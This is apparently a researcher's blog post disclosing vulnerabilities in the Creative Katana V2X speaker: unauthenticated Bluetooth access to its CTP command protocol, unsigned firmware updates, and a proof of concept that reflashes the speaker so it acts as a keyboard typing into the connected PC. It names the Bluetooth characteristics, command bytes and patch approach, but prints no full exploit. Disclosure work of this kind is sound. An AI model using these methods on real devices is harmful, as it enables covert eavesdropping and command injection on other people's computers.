Pwnd Blaster: Hacking your PC using your speaker without ever touching it
Pangram verdict · v3.3
We believe that this document is fully human-written
AI likelihood · overall
HumanArticle text · 1,781 words · 5 segments analyzed
In my last post, I talked about reverse engineering my new Creative Sound Blaster Katana V2X's firmware.What initially started as simply wanting to write a Linux tool for communicating with my speaker ended up with me discovering vulnerabilities which allow any attacker within a ~15M range of any Katana V2X to turn it into a covert spying tool and Rubber Ducky - all without ever having to pair with or physically touch the device.CTprotocol backgroundAs I explained in my previous post, the Katana V2X is a USB-connected PC sound bar. Being USB-connected, Creative has an app which allows you to change the settings of the speaker - the DSP, the LED configuration, the output source, and so on.To do this, they use a custom protocol called CTP (short for Creative Transport Protocol would be my guess). Basically, it seems to be a fairly simple proprietary protocol for sending various commands and reading the responses to that. I won't go into much detail here, but if you're interested, I described how it works in my last post.What's important to note, however, is that in order to do anything with CTP over USB, you first have to do challenge-response authentication with the device. The key is static and can be derived from the binaries that ship with the Creative App, and I'm unsure why this is even the case, but the speaker won't accept any commands until you've performed authentication. Fine.Another thing that'll become important later is that firmware updates are also performed over CTP. That's how I initially got my hands on a firmware image - I sniffed the USB traffic using Wireshark and extracted the data from the captures.Firmware analysisThe firmware container, which is also proprietary but is essentially a primitive Zip file, contains three parts that are of significant value.First, there's FBOOT, which I previously presumed to be a bootloader (hence the name), but also contains a sort of recovery mode for the speaker. This recovery mode can be entered by holding down the SOURCE button while powering the device on, and allows you to recover from a bad state. This saved my device from being bricked many times, which I'm pretty grateful for.The second part is FMAIN, which is the main firmware of the device. This runs when you boot the device "normally".
While FBOOT implements a lot of the same functionality as FMAIN (they both handle CTP commands, for example), FMAIN is about ~6.5x larger than FBOOT.Both FBOOT and FMAIN are based on a (fairly heavily-modified) version of FreeRTOS, as hinted by a string present in the binaries: /home/jieyi/mcuos2.5/kernel/freertos-8.2.3/.The last part of note is CHK2, which is a SHA-256 checksum over the entire firmware container appended to the very end.While not exactly shocking, considering the amount of effort that went into CTP authentication, I was a bit surprised to see that besides this CHK2 SHA-256 checksum, which was trivial to patch, there was no other protection in place for flashing firmwares. I would've expected to find signature checks here or at the very least a hashsum(secret_value + container_contents) type of protection, but after reimplementing the firmware upgrade functionality in my own tool v2x-ctl, I found that the device happily accepts patched firmwares as long as CHK2 is correct.To test this, I made a pretty simple modification - I replaced the string WELCOME, which is shown on the segment display on the device when booting up, with PATCHED. After flashing the firmware and rebooting the device, I was happy to see my string being shown to me:The hacker part of me thinks this is great - people should be able to do what they want with the devices they've bought and own. The security professional part of me thinks that having absolutely no protection in place (like having to unlock a bootloader for mobile devices) is pretty bad practice. But it's not exactly the end of the world if you need physical access to update the device over USB.If.Everybody loves BluetoothLike all "self-respecting" speakers these days, of course the Katana V2X also needs to have Bluetooth, even though it's most likely going to spend most of its life wired up to a PC or gaming console.And of course Creative needs to have an app which lets you control the speaker's settings and fancy LED lights from your phone over Bluetooth.
The way BLE (Bluetooth Low Energy) works is that each device has various registers (called GATT characteristics) that, if you're connected to the device, you can write to, read, subscribe to notifications for, and so on. What's important to note is that to connect to a device, you don't need to (necessarily) pair with it. You can often just connect with a device and immediately start reading and writing data to characteristics. Pairing establishes encryption, but a connection can be made without it.While digging through the Katana's firmware, I discovered that the internal CTP handler is bridged to both USB and apparently Bluetooth:Intrigued by this, I downloaded the Creative mobile app and tried connecting to my speaker."Please press the POWER button to pair."I wondered how this pairing process worked, exactly. Maybe it used the same authentication scheme as for USB and maybe I could just use the shared secret to authenticate with any speaker over Bluetooth, as was the case with my e-scooter.I set up a Bluetooth sniffing environment and observed that in order to initiate the pairing process, the phone wrote a payload like 5a 0b... to a characteristic 9e9daaec-3a10-4fe8-b69f-7397aff77886, and read a response from characteristic 9e9daaeb-3a10-4fe8-b69f-7397aff77886.5a had me very, very suspicious, as it's the same byte that all CTP commands start with. Out of a hunch, I connected to the device over Bluetooth from my laptop and wrote the payload 5a 09 01 02, which is the CTP command for reading the firmware version, and requires authentication to send over USB.To my surprise, upon reading the characteristic 9e9daaeb-3a10-4fe8-b69f-7397aff77886, I was greeted with the full version string. This means anyone can just connect to any Katana V2X over Bluetooth and start sending CTP commands to it, reading information, changing settings, etc.
Over-the-air updates (the bad kind)It didn't take me too long to connect the dots that firmware upgrades were also performed over CTP. Combined with the fact that anyone can construct valid custom firmware, I wondered if it was possible for an attacker to simply upload a custom firmware over Bluetooth without ever having to authenticate or pair.After wrestling with a few BLE quirks (which I'll describe in detail later in this article), I wrote a relatively simple Python script that does exactly what my v2x-ctl tool does to upgrade firmware, but over Bluetooth instead. Using that, I attempted to upload the modified firmware I had crafted earlier to my speaker. Since BLE is quite slow, it took around 10 minutes to finish, but after it was done, I was once again greeted with my lovely "PATCHED" welcome message.I thought of the implications for a bit. The speaker has a microphone. An attacker could, theoretically, upload a custom firmware that effectively turns the speaker into a covert monitoring device, listening in on conversations and forwarding them to a receiver over Bluetooth.What was more interesting to me was the fact that the speaker is, in a standard setup, connected to a PC over USB. It's by all means a trusted USB device.What if we wrote custom firmware that forced the speaker into acting as a keyboard, sending keystrokes for opening up the terminal and executing arbitrary commands? We would turn the speaker into a Rubber Ducky, but remotely, without ever having to plug anything into either the speaker or the PC.Living off the kernel landAt first, I thought this would be a herculean task. Since I don't have access to the source code of the firmware, I would have to somehow jury-rig in an entire section of code that sets the device up as a HID (human interface device) USB device (if that's even possible for this SoC), a procedure for then using this to send keystrokes to the PC over USB, and continuing to run the rest of the code in the firmware so the speaker would still behave as normal.However, after digging around some more in the firmware, I realized it's likely not as difficult as it seems.First off, it turns out the speaker already sets itself up as a HID device.
Not as a full keyboard, mind you, but as a Consumer Control device - basically letting the speaker change the volume and media status (play/pause) on the PC, but not much else.This could be seen in the kernel logs:The way this is done with USB devices is that the device presents the PC with a USB descriptor set, which is basically a report of its capabilities, what it can do, how many interfaces to enumerate, and so on.The report descriptor in the firmware was pretty easy to locate and to my luck, it had enough space to append a second report descriptor entry that also presented the device as a keyboard. Running dmesg now shows that the device also reports being a keyboard:The second issue was sending actual HID data and emulating keystrokes. Much to my luck, the firmware already had a neatly usable routine for sending HID data, all I had to do was provide it with data (the key to press or unpress) and call it.The third issue I struggled with quite a bit. It was difficult to find enough free space that I could write in (which would get properly mapped in memory or wouldn't immediately crash the device when booting), finding a trampoline that worked properly and didn't crash returning back to the normal instruction flow, etc.I eventually realized that if this is running on FreeRTOS, there's likely numerous tasks being executed on boot anyways. I don't need to write a trampoline and juggle the execution flow, I can just overwrite an existing task and let the firmware spawn it for me. I ended up finding a diagnostic task, which didn't seem to do anything in normal use - from what I could tell, it was only used for gathering diagnostic data from a DSP coprocessor.I overwrote that task with a task that:Waits ~20 seconds for the speaker to boot and bring up the USB subsystemTypes in echo pwned and hits enter, with ~20ms between each keystrokeEnds the task, leaving the rest of the speaker's functionality intactThis would be executed every time the device booted up.The patches ended up being pretty minimal - only 83 bytes for the USB report and 102 bytes of hand-written ARM/Thumb assembly for the keystroke injector, plus 2 bytes for every keystroke I wanted to send.